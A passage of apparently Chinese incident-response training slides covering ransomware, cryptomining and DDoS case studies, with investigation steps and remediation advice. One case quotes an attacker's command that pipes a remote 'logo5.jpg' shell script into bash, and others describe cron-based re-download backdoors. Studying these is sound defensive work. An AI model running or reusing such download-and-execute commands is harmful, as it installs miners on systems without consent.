：案例二結(jié)論向客戶說明服務(wù)器中勒索病毒，目前暫時(shí)無法解密，只能通過重裝操作系統(tǒng)來恢復(fù)；案例三事件概述www.iuqerfsodp9ifjaposdfjhgosurij域名疑似被種植勒索病毒，客戶希望排查該機(jī)器是否存在問題；案例三事件分析響應(yīng)人員到場了解情況后，發(fā)現(xiàn)進(jìn)程中存在mssecsvc.exe*32可疑進(jìn)程進(jìn)程中發(fā)現(xiàn)大量請求445連接：案例三通過查看該程序發(fā)現(xiàn)為2017/09/08被植入通過排查啟動(dòng)項(xiàng)發(fā)現(xiàn)被加入了mssecsvc2.0啟動(dòng)項(xiàng)；案例三通過提取樣本在虛擬機(jī)上運(yùn)行發(fā)現(xiàn)該程序運(yùn)行后會(huì)請求\h域名并且會(huì)產(chǎn)生大量445連接請求：案例三通過360威脅情報(bào)分析和人工分析確認(rèn)該程序?yàn)槔账鞑《荆喊咐Y(jié)論最后清理后，統(tǒng)一查看網(wǎng)絡(luò)連接、進(jìn)程、等是否正常，為客戶提供相關(guān)處置建議。勒索病毒家族7ev3nCryptoJokerKimcilWareRadamant8lock8CryptoMixKriptovoRemindMAlphaCryptoTorLockerKryptoLockerRokkuAutoLockyCryptoWallLeChiffreSamasBitCryptorCryptXXXLockySanctionBitMessageCrySiSLortokShadeBooyahCTB-LockerMagicShujinBrazilianRansomwareDMALockerBuyUnlockCodeECLRRansomwareMireWareCerberEnCiPhErEdMischaSurpriseChimeraEnigmaMobefTeslaCryptCoinVaultGhostCryptNanoLockerTrueCrypterCovertonGNLLockerNemucodCryprenHiBuddy!Nemucod-7zCrypt0L0ckerHydraCryptOMG!RansomcryptCryptoDefenseJigsawPadCryptWonderCrypterCryptoFortressJobCrypterPClockXortCryptoHasYouKeRangerPowerWareXTBLCryptoHitmanKEYHolderProtectedRansomwareMaktubLockerSNSLockerSuperCryptUmbreCryptVaultCryptVirlocker傳播方式（一）服務(wù)器入侵傳播（二）利用漏洞自動(dòng)傳播（三）軟件供應(yīng)鏈攻擊傳播（四）郵件附件傳播（五）利用掛馬網(wǎng)頁傳播勒索病毒攻擊特點(diǎn)（一）無C2服務(wù)器加密技術(shù)流行（二）攻擊目標(biāo)轉(zhuǎn)向政企機(jī)構(gòu)（三）針對關(guān)鍵信息基礎(chǔ)設(shè)施的攻擊（四）攻擊目的開始多樣化（五）勒索軟件平臺(tái)化運(yùn)營（六）境外攻擊者多于境內(nèi)攻擊者勒索病毒事件防御個(gè)人終端防御技術(shù)（一）文檔自動(dòng)備份隔離保護(hù)（二）綜合性反勒索軟件技術(shù)勒索病毒事件防御企業(yè)級終端防御技術(shù)（一）云端免疫技術(shù)（二）密碼保護(hù)技術(shù)挖礦木馬處置流程了解現(xiàn)狀安全設(shè)備告警？CPU內(nèi)網(wǎng)主機(jī)掛了？了解發(fā)病時(shí)間設(shè)備告警最早發(fā)生時(shí)間？CPU使用率突然很高的開始時(shí)間？主機(jī)宕機(jī)時(shí)間？了解系統(tǒng)架構(gòu)系統(tǒng)名稱IP地址端口開放物理機(jī)/虛擬機(jī)主機(jī)名設(shè)備型號(hào)操作系統(tǒng)類型BIDW（數(shù)據(jù)庫）節(jié)點(diǎn)0110.2xx.xx.xx80、22物理機(jī)BnnnnIBMP595AIX操作系統(tǒng)版本管理后臺(tái)IP地址中間件類型中間件版本數(shù)據(jù)庫類型數(shù)據(jù)庫版本應(yīng)用URLAIX5.310.xx.xxx.79was7oracleV11應(yīng)用端口儲(chǔ)存設(shè)備類型儲(chǔ)存設(shè)備型號(hào)web框架中間件版本第三方組件80磁帶庫3584/L52struts2.4編輯器確認(rèn)感染者操作系統(tǒng)版本管理后臺(tái)IP地址中間件類型中間件版本數(shù)據(jù)庫類型數(shù)據(jù)庫版本應(yīng)用URLAIX5.310.xx.xxx.79was7oracleV11應(yīng)用端口儲(chǔ)存設(shè)備類型儲(chǔ)存設(shè)備型號(hào)web框架中間件版本第三方組件80磁帶庫3584/L52struts2.4編輯器處置建議斷網(wǎng)或ACL隔離；結(jié)束惡意進(jìn)程；提取木馬樣本反饋二線專家；刪除木馬；防御措施安裝360天擎，對被感染機(jī)器進(jìn)行安全掃描和病毒查殺；對系統(tǒng)進(jìn)行補(bǔ)丁更新，封堵病毒傳播途徑；制定嚴(yán)格的口令策略，避免弱口令；結(jié)合備份的網(wǎng)站日志對網(wǎng)站應(yīng)用進(jìn)行全面代碼審計(jì)，找出攻擊者利用的漏洞入口進(jìn)行封堵；配合全流量設(shè)備（如天眼）對全網(wǎng)中存在的威脅進(jìn)行分析，排查問題；案例一事件概述某廠商通過天眼、服務(wù)器分析發(fā)現(xiàn)多臺(tái)服務(wù)器被植入挖礦木馬；案例一事件分析通過天眼告警發(fā)現(xiàn)13個(gè)IP感染挖礦木馬；案例一登錄被感染挖礦木馬的服務(wù)器：x.x.x.x首先通過本地DNS流量解析發(fā)現(xiàn)該機(jī)器確實(shí)存在挖礦木馬；案例一登錄的這臺(tái)機(jī)器可以看到DNS解析過該域名，由此判斷該機(jī)器中了挖礦木馬，使用相關(guān)工具分析發(fā)現(xiàn)其中csrss.exe進(jìn)程為偽裝的系統(tǒng)進(jìn)程，通過該進(jìn)程有2個(gè)派生進(jìn)程和其中為loader程序負(fù)責(zé)加載和配置文件：案例一通過查看mscorswv.exe配置發(fā)現(xiàn)該程序會(huì)連接：xmr.crypt-pool.fr案例一通過對該木馬分析后發(fā)現(xiàn)該木馬會(huì)創(chuàng)建名稱為：system_updatea的系統(tǒng)服務(wù)；案例一結(jié)論最后清理后，統(tǒng)一查看網(wǎng)絡(luò)連接、進(jìn)程、等是否正常，為客戶提供相關(guān)處置建議；案例二事件概述某公司近期發(fā)現(xiàn)服務(wù)器運(yùn)行速度變慢主站無故出現(xiàn)打開緩慢甚至無法打開、http狀態(tài)503錯(cuò)誤等現(xiàn)象，客戶登錄服務(wù)器后發(fā)現(xiàn)CPU占用率在長時(shí)間保持100%斷網(wǎng)后服務(wù)器CPU下降恢復(fù)正常，嘗試結(jié)束進(jìn)程刪除文件后重啟服務(wù)器進(jìn)程自動(dòng)恢復(fù)；案例二事件分析360應(yīng)急響應(yīng)人員到場了解情況后，通過查看系統(tǒng)進(jìn)程后發(fā)現(xiàn)多個(gè)異常進(jìn)程：alg.exe、splwow64.exe通過對進(jìn)程參數(shù)進(jìn)行判斷判定該進(jìn)程是惡意挖礦程序該程序在工作時(shí)會(huì)導(dǎo)致CPU長時(shí)間高負(fù)荷運(yùn)行：案例二通過調(diào)用參數(shù)發(fā)現(xiàn)該挖礦程序會(huì)與遠(yuǎn)端礦池進(jìn)行連接：xmr.crypto-pool.fr案例二結(jié)束程序以及刪除啟動(dòng)項(xiàng)信息后重啟發(fā)現(xiàn)系統(tǒng)恢復(fù)正常該挖礦程序沒有自動(dòng)加載。通過對文件分析發(fā)現(xiàn)該文件是由alg.exe加載并運(yùn)行的，通過alg.exe植入時(shí)間可以發(fā)現(xiàn)植入時(shí)間為2017/10/05通過排查系統(tǒng)日志和安全日志發(fā)現(xiàn)已經(jīng)被刪除最早產(chǎn)生日志的時(shí)間為2017/10/06懷疑在黑客操作完成后刪除了系統(tǒng)日志；案例二：通過對服日志排查發(fā)現(xiàn)在2017/10/3之后出現(xiàn)過多次登錄記錄賬戶為：Support與客戶確認(rèn)后發(fā)現(xiàn)該賬戶不屬于客戶自用賬戶懷疑為黑客建立的管理賬戶該賬戶登錄IP為：53歸屬地為:俄羅斯不排除為跳板主機(jī)：案例二通查看Sopport賬戶進(jìn)行查看發(fā)現(xiàn)該賬戶建立時(shí)間為2017/08/26最后登錄時(shí)間為2017/10/05：案例二結(jié)論最后清理后，統(tǒng)一查看網(wǎng)絡(luò)連接、進(jìn)程、等是否正常，為客戶提供相關(guān)處置建議。案例三事件概述某廠商外網(wǎng)服務(wù)器出現(xiàn)CPU異常，疑似挖礦程序病毒事件分析；案例三事件分析使用top查看到wnTKYG.noaes進(jìn)程占用大量cpu資源，和ddg.2020可疑進(jìn)程，wnTKYG.noaes為挖礦病毒主進(jìn)程：案例三使用lsof查看對外連接情況，發(fā)現(xiàn)wnTKYG.noaes對28:8443和18.rev.poneytelecom.eu:443發(fā)起TCP外連請求；lsof命令用于查看你進(jìn)程開打的文件，打開文件的進(jìn)程，進(jìn)程打開的端口(TCP、UDP)。找回/恢復(fù)刪除的文件。是十分方便的系統(tǒng)監(jiān)視工具，因?yàn)閘sof命令需要訪問核心內(nèi)存和各種文件，所以需要root用戶執(zhí)行。lsof命令用于查看你進(jìn)程開打的文件，打開文件的進(jìn)程，進(jìn)程打開的端口(TCP、UDP)。找回/恢復(fù)刪除的文件。是十分方便的系統(tǒng)監(jiān)視工具，因?yàn)閘sof命令需要訪問核心內(nèi)存和各種文件，所以需要root用戶執(zhí)行。案例三使用ps查看挖礦程序進(jìn)程，程序路徑為/tmp/wnTKYg.noaes，被程序自身刪除前已經(jīng)加載到內(nèi)存中，可進(jìn)行挖礦操作：案例三ddg.2020為挖礦病毒守護(hù)和傳播進(jìn)程，從運(yùn)行記錄的時(shí)間戳得知該操作存在于11月9日23時(shí)44分，攻擊者已于該時(shí)間進(jìn)入服務(wù)器：案例三使用lsof查看對外連接情況，發(fā)現(xiàn)ddg.2020對28:8443發(fā)起TCP外連請求：案例三查看定時(shí)任務(wù)，發(fā)現(xiàn)攻擊者在計(jì)劃任務(wù)中留下了定時(shí)啟動(dòng)腳本，刪除挖礦程序后可通過每隔5分鐘執(zhí)行一次計(jì)劃任務(wù)中的后門腳本重新下載啟動(dòng)；案例三云端i.sh腳本內(nèi)容如下：案例三云端木馬樣本地址可訪問:案例三經(jīng)后端人員反編譯分析ddg樣本后，發(fā)現(xiàn)此樣本有弱口令爆破的功能，使用內(nèi)置賬戶/口令字典，對ssh和rdp進(jìn)行批量登錄嘗試，爆破成功后繼續(xù)橫向傳播。該挖礦木馬還可通過redis未授權(quán)訪問漏洞進(jìn)行傳播：案例三結(jié)論中招服務(wù)器臨時(shí)解決方案：清除挖礦后臺(tái)任務(wù)終止挖礦進(jìn)程清理挖礦相關(guān)文件防火墻上封禁挖礦樣本下載和外連地址案例三和管理員繼續(xù)分析，為保證客戶業(yè)務(wù)系統(tǒng)安全運(yùn)行，并為客戶提供相關(guān)處置建議：情況，避免規(guī)律性，定期進(jìn)行修改；加強(qiáng)訪問控制策略，限制粒度達(dá)到端口級，如SSH、redis白名單策略，對于業(yè)務(wù)無需外網(wǎng)訪問的情況下，禁止對外網(wǎng)直接提供訪問；開啟登錄事件檢測，對大量登錄失敗的源IP破；開啟SSH證書登錄，避免直接使用密碼進(jìn)行登錄，同時(shí)禁止用戶直接遠(yuǎn)程登錄，對于需要權(quán)限的操作，使用sudo數(shù)據(jù)庫增加密碼訪問認(rèn)證；6.定期對系統(tǒng)日志進(jìn)行備份，避免攻擊者惡意刪除相關(guān)日志文件，阻斷溯源能力，同時(shí)加強(qiáng)日常安全巡查，防范于未然；案例四事件概述某廠商外網(wǎng)服務(wù)器*.*.*.*除，疑似挖礦程序病毒；案例四事件分析遠(yuǎn)程到服務(wù)器****，對服務(wù)器系統(tǒng)和服務(wù)進(jìn)行分析，發(fā)現(xiàn)CPU內(nèi)存資源大量被占用，服務(wù)器上運(yùn)行著weblogicweb服務(wù)器，發(fā)現(xiàn)多個(gè)異常文件(見附件)，疑似挖礦程序病毒：案例四查看559.sh腳本內(nèi)容：腳本先是殺掉服務(wù)器上cpu占用大于20%的進(jìn)程，然后從遠(yuǎn)程6（福建，黑客所控制的一個(gè)IDC服務(wù)器）下載了病毒程序并執(zhí)行；案例四登錄360威脅情報(bào)中心對疑似惡意地址進(jìn)行查看分析案例四通過360大數(shù)據(jù)威脅分析平臺(tái)對“xmrig”、“gay”、“559”等樣本文件進(jìn)行分析發(fā)現(xiàn)是虛擬幣惡意挖礦程序：案例四檢查服務(wù)器執(zhí)行命令日志，發(fā)現(xiàn)黑客曾經(jīng)從多個(gè)遠(yuǎn)程地址08（美國）、5（加拿大）、71（荷蘭）下載了惡意程序ljava并執(zhí)行；案例四檢查系統(tǒng)定時(shí)任務(wù)，發(fā)現(xiàn)黑客添加了一條定時(shí)任務(wù)，定時(shí)從1(美國)下載并執(zhí)行惡意程序任務(wù)：案例四通過360大數(shù)據(jù)威脅分析平臺(tái)對1進(jìn)行分析，發(fā)現(xiàn)是一個(gè)由黑客控制的idc服務(wù)器案例四對weblogic中間件日志進(jìn)行排查分析，發(fā)現(xiàn)黑客執(zhí)行了java反序列化漏洞攻擊案例四對weblogic中間件日志進(jìn)行排查分析，發(fā)現(xiàn)黑客執(zhí)行了java反序列化漏洞攻擊案例四繼續(xù)分析weblogic遠(yuǎn)程命令執(zhí)行漏洞，對黑客攻擊過程進(jìn)行了復(fù)現(xiàn)，確認(rèn)weblogic存在該漏洞，并可遠(yuǎn)程直接獲取服務(wù)器權(quán)限、執(zhí)行任意命令、上傳下載文件等案例四最后清理后，統(tǒng)一查看網(wǎng)絡(luò)連接、進(jìn)程、等是否正常，是否有后門和可疑用戶等，此次案例未發(fā)現(xiàn)異常用戶和后門：案例四結(jié)論和管理員繼續(xù)分析，為保證客戶業(yè)務(wù)系統(tǒng)安全運(yùn)行，并為客戶提供相關(guān)處置建議；1、停止問題weblogic服務(wù)；2、重新部署操作系統(tǒng)；3、重新部署業(yè)務(wù)應(yīng)用程序；4、更新weblogic最新補(bǔ)丁包；5、修改操作系統(tǒng)、數(shù)據(jù)庫、應(yīng)用系統(tǒng)等原來使用的密碼；案例五事件概述某廠商內(nèi)網(wǎng)內(nèi)一臺(tái)服務(wù)器發(fā)現(xiàn)挖礦程序在運(yùn)行；案例五事件分析通過Teamview遠(yuǎn)程訪問服務(wù)器，查看當(dāng)前進(jìn)程，發(fā)現(xiàn)weblogic用戶存在可疑進(jìn)程：案例五/bin/sh-ccurl-s86:8220/logo5.jpg|bash-s其主要作用是請求下載86:8220/logo5.jpg文件，并運(yùn)行。logo5.jpg文件實(shí)質(zhì)為shell腳本文件，下載運(yùn)行后將會(huì)進(jìn)行一系列的動(dòng)作，同時(shí)植入挖礦木馬；案例五該shell腳本部分代碼如圖：案例五查看任務(wù)計(jì)劃，發(fā)現(xiàn)該腳本執(zhí)行最終會(huì)在服務(wù)器中/var/tmp/ssaess植入門羅幣挖礦木馬，同時(shí)該腳本往計(jì)劃任務(wù)寫入定時(shí)執(zhí)行的任務(wù)。由于計(jì)劃任務(wù)不斷在運(yùn)行，因此該文件被重復(fù)覆蓋刷新，因此不能以該時(shí)間作為入侵時(shí)間案例五查看計(jì)劃任務(wù)日志/var/log/cron*，發(fā)現(xiàn)可疑的計(jì)劃任務(wù)執(zhí)行：案例五通過排查可發(fā)現(xiàn)運(yùn)行計(jì)劃任務(wù)的時(shí)間為1月21日-1月23日之間。推斷入侵時(shí)間為此時(shí)間段期間。后續(xù)查看訪問日志，進(jìn)行排查，發(fā)現(xiàn)有訪問wls-wsat組件的記錄，最早訪問時(shí)間為22/12/2017:17:22:54，因此推斷，入侵行為發(fā)生在去年12月22號(hào)之后：案例五同時(shí)發(fā)現(xiàn)訪問日志中IP地址0、93、94、8的訪問時(shí)間與系統(tǒng)計(jì)劃任務(wù)的執(zhí)行時(shí)間接近，并且狀態(tài)碼返回500，因此推斷以上IP是本次事件的攻擊者。同時(shí)通過日志分析可發(fā)現(xiàn)在2018年1月4號(hào)至2018年1月23號(hào)之間，持續(xù)有攻擊者利用wls-wsat組件漏洞對本服務(wù)器發(fā)起過攻擊。但由于沒有全流量設(shè)備，無法記錄入侵者具體執(zhí)行的命令內(nèi)容案例五結(jié)論經(jīng)與管理員繼續(xù)分析，為保證客戶業(yè)務(wù)系統(tǒng)安全運(yùn)行，并為客戶提供相關(guān)處置建議：刪除用戶目錄下的logo5.jpg文件；檢查以及weblogic用戶的計(jì)劃任務(wù)，通過crontabl查看，清除惡意的計(jì)劃任務(wù)；刪除文件/var/tmp/ssaess、/var/tmp/config.json；聯(lián)系相關(guān)廠家更新weblogic補(bǔ)丁；DDOS攻擊處置流程* 了解現(xiàn)狀流量異常增大？安全設(shè)備告警？了解發(fā)病時(shí)間流量異常發(fā)生時(shí)間？設(shè)備告警發(fā)生時(shí)間？了解事件發(fā)生時(shí)間，后面以此時(shí)間點(diǎn)做排查重點(diǎn)；了解系統(tǒng)架構(gòu)了解當(dāng)前的網(wǎng)絡(luò)架構(gòu)以及網(wǎng)絡(luò)設(shè)備情況，同時(shí)了解業(yè)務(wù)系統(tǒng)架構(gòu)，相關(guān)安全設(shè)備是否有告警等；了解當(dāng)前帶寬總量，是否為重要業(yè)務(wù)系統(tǒng)設(shè)置QoS，進(jìn)行帶寬獨(dú)享以及優(yōu)化。事件排查1、查看相關(guān)網(wǎng)絡(luò)設(shè)備或安全設(shè)備，查看在異常時(shí)間段是否存在異常流量高峰2、根據(jù)流量情況統(tǒng)計(jì)，查看流量分布情況，TCP以及UDP協(xié)議的流量分布情況，是否有明顯的突增情況3、根據(jù)流量情況統(tǒng)計(jì)，查看流量協(xié)議的分布情況，查看入網(wǎng)的流量何種應(yīng)用層協(xié)議的分布明顯突增，如HTTP、DNS、SMB等判斷依據(jù)根據(jù)到的攻擊是網(wǎng)絡(luò)層攻擊或應(yīng)用層攻擊以及屬于哪一種協(xié)議的攻擊；攻擊所占用的資源分為三種，分別為：帶寬、連接數(shù)；目的通常是消耗網(wǎng)絡(luò)資源以及系統(tǒng)性能資源，導(dǎo)致訪問緩慢或業(yè)務(wù)系統(tǒng)崩潰。通過分析異常時(shí)間段內(nèi)的訪問日志或流量中HTTP訪問記錄，分析是否存在異常訪問；主要關(guān)注IP分布、各個(gè)IP的請求數(shù)、請求URL。判斷依據(jù)根據(jù)到的攻擊是網(wǎng)絡(luò)層攻擊或應(yīng)用層攻擊以及屬于哪一種協(xié)議的攻擊；攻擊所占用的資源分為三種，分別為：帶寬、連接數(shù)；目的通常是消耗網(wǎng)絡(luò)資源以及系統(tǒng)性能資源，導(dǎo)致訪問緩慢或業(yè)務(wù)系統(tǒng)崩潰。通過分析異常時(shí)間段內(nèi)的訪問日志或流量中HTTP訪問記錄，分析是否存在異常訪問；主要關(guān)注IP分布、各個(gè)IP的請求數(shù)、請求